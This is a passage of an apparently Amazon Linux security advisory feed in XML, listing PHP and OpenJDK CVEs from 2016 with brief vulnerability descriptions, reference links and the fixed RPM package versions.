CVE-2016-5771 php: Use After Free Vulnerability in PHP's GC algorithm and unserialize
CVE-2016-5770:
A type confusion issue was found in the SPLFileObject fread() function. A remote attacker able to submit a specially crafted input to a PHP application, which uses this function, could use this flaw to execute arbitrary code with the privileges of the user running that PHP application.
1351171:
CVE-2016-5770 php: Int/size_t confusion in SplFileObject::fread
CVE-2016-5769:
1351070:
CVE-2016-5769 php: Integer Overflows in mcrypt_generic() and mdecrypt_generic() resulting in heap overflows
CVE-2016-5768:
A double free flaw was found in the mb_ereg_replace_callback() function of php which is used to perform regex search. This flaw could possibly cause a PHP application to crash.
1351168:
CVE-2016-5768 php: Double free in _php_mb_regex_ereg_replace_exec
CVE-2016-5767:
An integer overflow, leading to a heap-based buffer overflow was found in the gdImagePaletteToTrueColor() function of PHP&#039;s gd extension. A remote attacker could use this flaw to crash a PHP application or execute arbitrary code with the privileges of the user running that PHP application, using gd via a specially crafted image buffer.
1351069:
CVE-2016-5767 gd: Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
CVE-2016-5766:
An integer overflow, leading to a heap-based buffer overflow was found in the imagecreatefromgd2() function of PHP&#039;s gd extension. A remote attacker could use this flaw to crash a PHP application or execute arbitrary code with the privileges of the user running that PHP application, using gd via a specially crafted GD2 image.
1351068:
CVE-2016-5766 gd: Integer Overflow in _gd2GetHeader() resulting in heap overflow
CVE-2016-5385:
It was discovered that PHP did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a PHP CGI script to an attacker-controlled proxy via a malicious HTTP request.
1353794:
CVE-2016-5385 PHP: sets environmental variable based on user supplied Proxy request header
CVE-2015-8874:
Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.
1336772:
CVE-2015-8874 gd: gdImageFillToBorder deep recursion leading to stack overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8874" title="" id="CVE-2015-8874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5385" title="" id="CVE-2016-5385" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5766" title="" id="CVE-2016-5766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5767" title="" id="CVE-2016-5767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5768" title="" id="CVE-2016-5768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5769" title="" id="CVE-2016-5769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5770" title="" id="CVE-2016-5770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5771" title="" id="CVE-2016-5771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5772" title="" id="CVE-2016-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5773" title="" id="CVE-2016-5773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-odbc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.24-1.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-729</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-729: important priority package update for java-1.7.0-openjdk</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-01 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3610:
Unspecified vulnerability in Oracle Java SE 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Libraries, a different vulnerability than CVE-2016-3598.
1356994:
CVE-2016-3610 OpenJDK: insufficient value count check in MethodHandles.filterReturnValue() (Libraries, 8158571)
CVE-2016-3606:
Unspecified vulnerability in Oracle Java SE 7u101 and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Hotspot.
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3598:
Unspecified vulnerability in Oracle Java SE 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Libraries, a different vulnerability than CVE-2016-3610.
1356971:
CVE-2016-3598 OpenJDK: incorrect handling of MethodHandles.dropArguments() argument (Libraries, 8155985)
CVE-2016-3550:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality via vectors related to Hotspot.
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3500.
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3508.
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; and Java SE Embedded 8u91 allows remote attackers to affect integrity via vectors related to CORBA.
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3598" title="" id="CVE-2016-3598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3610" title="" id="CVE-2016-3610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.111-2.6.7.2.68.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" 